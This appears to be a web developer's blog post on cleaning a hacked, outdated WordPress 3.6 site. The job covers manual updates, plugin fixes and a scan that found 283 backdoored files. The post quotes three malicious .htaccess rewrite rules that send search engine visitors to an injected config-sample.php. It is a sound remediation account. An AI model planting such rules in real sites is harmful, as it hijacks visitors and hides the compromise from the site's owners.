This particular website was on wordpress 3.6 and had not been updated in 8 or so years. The site ran smoothly up until today, the customer noticed that if you google the site and click the link it actually brings you to a different site. This was a super sneaky hack as the admins would most likely not google the site, but all the customers would so it makes it hard to detect. After a quick look in the HTACCESS file I found the culprit.

RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ config-sample.php?$1 [L]

After this was fixed I wanted to update the site and run a scan to make sure there was nothing else on the site that could be causing issues. Unfortunately wordpress would not let me update because PHP was outdated, but updating the php version white screened the site. This means the only way to update is to manually install the new files on top of the site so that all the old files get overwritten. After some complications with the host, I finally got the site updated and was greeted with a bunch of fatal errors. Lucky these were all from plugins so I just renamed the plugin folder and then the site loaded with a bunch of errors, after this is just updated all the plugins and removed unused ones and reactivated again. Now the site was updated and running smoothly. Next I ran a security scan, it was not very hopeful.

 

 

This scan shows 283 malicious files with backdoors to hackers. This plugin scans the website files against the offical wordpress files and sees if there are any discrepancies aswell as checking for common hacks and misc other things that could cause harm. After deleting all the files i ran the scan again and there was an abandoned plugin, I will recommend the client replace it, but it is not a security vulnerability at the current time. After that i ran some more scan from external sites to 100% verify that the site is clean, and all the tests came back clean and the site is now restored updated and secure.

Contact Form

close-link